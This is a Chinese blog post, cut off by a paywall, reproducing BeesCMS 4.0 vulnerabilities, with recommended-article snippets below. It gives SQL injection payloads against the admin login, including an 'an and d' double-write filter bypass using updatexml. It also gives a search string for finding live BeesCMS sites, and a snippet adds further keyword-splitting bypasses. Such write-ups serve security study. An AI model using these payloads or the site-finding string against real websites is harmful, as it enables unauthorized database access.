BeesCMS4.0多处漏洞复现

最新推荐文章于 2025-03-24 09:27:42 发布
最新推荐文章于 2025-03-24 09:27:42 发布
阅读量8.6k 收藏 23
点赞数 4
分类专栏: 代码审计:实战 文章标签: 安全 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43573676/article/details/105627370
版权
文章详细介绍了BeesCMS4.0的三个主要安全漏洞:后台报错注入、变量覆盖和文件上传。通过复现过程展示了如何利用这些漏洞,包括SQL注入的双写绕过、文件上传的Content-Type欺骗以及通过变量覆盖直接登录后台。同时,提到了这些漏洞可能带来的风险,并警告读者不要用于非法活动。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言

本次复现的漏洞有:

  1. 后台报错注入漏洞
  2. 变量覆盖漏洞
  3. 文件上传漏洞

Beescms v4.0由于后台登录设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入、文件上传、变量覆盖漏洞。现在依然有许多企业选用BeesCMS4.0,百度搜powerd by BEESCMS © 2010-2015 www.beescms.com 还是有很多站的:

在这里插入图片描述

漏洞复现

后台报错注入

正常输入后台账号密码提示密码错误:
在这里插入图片描述在这里插入图片描述

输入admin’报错,此处为显错注入:

admin'

在这里插入图片描述
使用order by 10探测字段长度,最终探测长度为5

order by 5#

在这里插入图片描述

order by 6#

在这里插入图片描述

爆数据库名时and被过滤,采用空格+双写绕过:

admin' an and d updatexml(1,concat(0x7e,select database(),0x7e),1)#

在这里插入图片描述在这里插入图片描述

查表

最低0.47元/天 解锁文章
BeesCMS的SQL注入漏洞
Ms08067安全实验室
08-06 3851
本文作者:arakh(MS08067实验室Web安全攻防知识星球学员)根据星球布置作业,完成BeesCMS的SQL注入漏洞过程如下:1. 扫描后台 获得后台登陆地址:2. 登陆后台...
Beescms_v4.0 sql注入漏洞复现与原理分析(白盒与黑盒)
不想当脚本小子的脚本小子
12-27 2733
一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1.官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html,然后解压压缩文件,然后把文件放到phpstudy的网站根目录 2.浏览器访问http://安装目录/install,开始安装 一直下一步出现如下界面即可安装完成: 安装完成后修改my.ini文件,在[mysqld]后面添加secure_fil
Linux telnet 命令详解:基于 TCP/IP 协议的网络协议,允许用户远程访问远程计算机的命令行界面
最新发布
yangchuang111213的博客
03-24 2025
是一种经典的远程登录工具,曾广泛用于网络通信中,但由于安全性差,它现在已经不再推荐使用。的最大缺点是它不对数据进行加密,导致在传输过程中,用户名、密码等敏感信息都可能被中间人窃取。是一种基于 TCP/IP 协议的网络协议,允许用户远程访问远程计算机的命令行界面。如果要连接到远程主机的其他端口,可以在命令中指定端口号。命令,用户可以通过网络与远程系统建立连接,并执行远程主机上的命令。连接成功后,用户可以输入远程主机的用户名和密码,进行登录。,成为远程登录和文件传输的标准工具,提供了加密和更高的安全保障。
BeesCMS系统漏洞分析
weixin_47493074的博客
09-25 2992
BeesCMS系统漏洞分析
BeeS CMS 靶场漏洞攻略
shw_yzh的博客
10-08 1302
密码MD5解密后为admin。
[代码审计] beecms 4.0 漏洞总结
shawdow_bug的博客
09-24 6206
beecms漏洞
SQL注入讲解-BeesCMS系统漏洞分析溯源
Ryongao
02-06 2702
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
代码审计:beescms 登录框注入复现
qq_43233085的博客
02-24 1611
代码审计:beescms 登录框注入复现beescms环境搭建代码审计漏洞利用 beescms BEESCMS企业网站管理系统,SEO优化更快,无功能限制,后台上手容易,各类行业模板供选择使用!全面支持手机网站,电脑手机模板标签全部通用,一个后台管理,电脑、手机网站同步更新。 官网:http://www.beescms.com/ 演示:https://www.mycodes.net/49/9318...
360众测靶场题库之1-BeesCMS系统漏洞
zjl12344的博客
03-03 5618
360众测靶场题库
Beescms_v4.0 sql注入漏洞分析
WY92139010的博客
09-25 3588
Beescms_v4.0 sql注入漏洞分析 一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html 2、解压压缩文件,然后把文件放到phpstudy的网站根目录 3、浏览器访问htt...
BeesCMS系统漏洞分析溯源
qq_45927819的博客
11-14 5533
先使用御剑扫一波,发现后台登录界面admin/login.php: 用户名一栏输入单引号,发现存在sql注入, 当输入admin’ or 1=1#后又返回正常的报错界面 看来闭合符号为单引号 注入开始: admin' union select 1,2,3,4,5# union 和select被过滤了 既然存在报错信息,我们就尝试报错注入,经过尝试and也被过滤了,and用an and d代替,union用un union ion代替,select用selselectect代替: 报错注入 adm.
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
4.0.13 mysql 注入_Beescms_v4.0 sql注入漏洞分析
weixin_31526891的博客
01-26 563
Beescms_v4.0 sql注入漏洞分析一、漏洞描述Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。二、漏洞环境搭建1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html2、解压压缩文件,然后把文件放到phpstudy的网站根目录3、浏览器访问http://192.168.10.17...
beescms】命令执行、报错注入
qq_51979295的博客
09-28 944
pwn的题死活下载不下来,今天写点别的,还有点别的洞没写,改天补上
0x2B.BeesCMS系统漏洞分析溯源
qq_31679787的博客
10-23 913
通过使用御剑扫描得到了后台页面,测试了一下admin/admin,发现能够登陆,存在弱口令; 登陆到后台页面,发现操作系统是linux,开始寻找能够上传shell的页面; 寻找后发现,后台的功能都不能实现,但是在报错信息中能够得到网站目录为/var/www/html; 查找资料后发现在登陆界面存在SQL注入;在admin后加'测试,发现页面报错; 通过order by测试得...
Beescms网站渗透测试
glitter_12的博客
07-08 1272
beescms网站渗透测试,本实验有靶场环境的搭建过程及beescms网站渗透测试过程
beescms网站渗透测试和修复意见
TKXS
12-27 8620
beescms网站渗透测试 目录 1.环境搭建 2.渗透前信息收集 3.开始渗透 Beescms实验环境搭建 1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html 2、解压压缩文件,然后把文件放到phpstudy的网站根目录 3、浏览器访问http://127.0.0.1/beescms/install,开始安装 4、一直下一步,出现如下界面,输入数据库账户密码 5、成功安装 6、修改mysql.ini 文件,在mysqld 下添加条目: secu
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
DamnVanish的博客
10-01 613
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
Beescms代码审计
qq_50589021的博客
09-20 857
Beescms代码审计之任意文件上传漏洞 前言 本次代码审计过程主要针对文件上传漏洞初级审计流程的思路进行复现 关键代码 文件上传: $_FILES,type="file",上传,move_upload_file()等 开始 搜索type="file"字段发现不少东西: 选择第二个,发现了用户自定义的函数: 跟踪一下: 结合实际情况进行抓包通过参数定位到代码中进行确定: 可以确定确实是这一块的代码 两处滤点: 针对太大的图片进行了过滤 将图片类型与传入的参数$type数组进行了比较,判断是否满足数组
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值